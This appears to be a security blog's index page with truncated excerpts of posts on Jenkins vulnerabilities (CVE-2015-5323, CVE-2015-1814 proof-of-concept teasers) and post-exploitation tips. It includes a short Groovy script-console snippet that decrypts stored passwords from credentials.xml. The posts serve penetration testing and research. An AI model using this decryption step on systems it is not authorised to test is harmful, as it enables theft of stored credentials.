February 27, 2019

Jenkins – SECURITY-200 / CVE-2015-5323 PoC

API tokens of other users available to admins (SECURITY-200 / CVE-2015-5323): API tokens of other users were exposed to admins by default. On instances that don’t […]
February 27, 2019

Jenkins – SECURITY-180/CVE-2015-1814 PoC

Forced API token change (SECURITY-180/CVE-2015-1814)
https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change
Affected Versions: All Jenkins releases <= 1.605; all LTS releases <= 1.596.1
PoC: Tested against Jenkins 1.605
Burp output
Validate new token […]
February 28, 2019

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access, you can decrypt the saved passwords in credentials.xml in the following way:

    hashed_pw = '$PASSWORDHASH'
    passwd = hudson.util.Secret.decrypt(hashed_pw)
    println(passwd)

You […]
March 5, 2019

Jenkins – Identify IP Addresses of nodes

While doing some research I found several posts on Stack Overflow asking how to identify the IP address of nodes. You might want to know this if […]